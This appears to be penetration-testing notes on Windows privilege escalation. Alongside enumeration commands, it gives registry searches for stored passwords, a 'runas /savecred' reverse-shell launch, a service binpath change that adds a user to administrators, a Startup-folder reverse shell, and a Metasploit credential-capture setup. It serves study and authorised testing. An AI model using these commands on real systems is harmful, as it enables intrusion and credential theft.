# Windows Privilege Escalation ## Links * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html) * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp) * [JAWS](https://github.com/411Hall/JAWS) ## Account Types * __Administrator__ local & domain * __Standard__ local & domain * __Guest__ * __System__ ## Enumeration ### Users & Groups ```sh whoami /priv net users net users net localgroup net localgroup query session qwinsta ``` ### Files * [powershell](../../../../enumeration/windows/powershell.md) ### System ```sh hostname systeminfo | findstr /B /C:"OS Name" /C:"OS Version" ``` * Installed software ```sh wmic product get name,version,vendor ``` * Services ```sh wmic service list brief | findstr "Running" ``` ## Exploit ### DLL Hijacking * [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md) ### Unquoted Service Path * [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md) ### Token Impersonation * `SeImpersonatePrivilege` is necessary, check via `whoami priv` * Hot Potato is best before Server 2019 and Windows 10 (version 1809) * [Potatos](../../../../exploit/windows/docs/potatoes.md) * [itm4n](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) ### Schedules Tasks * `schtasks` * `Autoruns64.exe` ### MSI Elevated Installer * [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md) ### Search for Credentials ```sh cmdkey /list ``` * Use found credentials ```sh runas /savecred /user: reverse_shell.exe ``` * Keys containing passwords ``` reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` ### accesschk64 Permissions * Check access to files and folders ```sh accesschk64 -wvu "file.exe" ``` * If permission `SERVICE_CHANGE_CONFIG` is set ```sh sc config binpath="net localgroup administrators user /add" ``` * [Service escalation](../../../../exploit/windows/service_escalation/service_escalation.md) * Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards. ### Startup Application * Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` ### Password Mining * Set up metasploit ```sh use auxiliary/server/capture/http_basic set srvport 7777 set uripath pass ``` * Visit site on target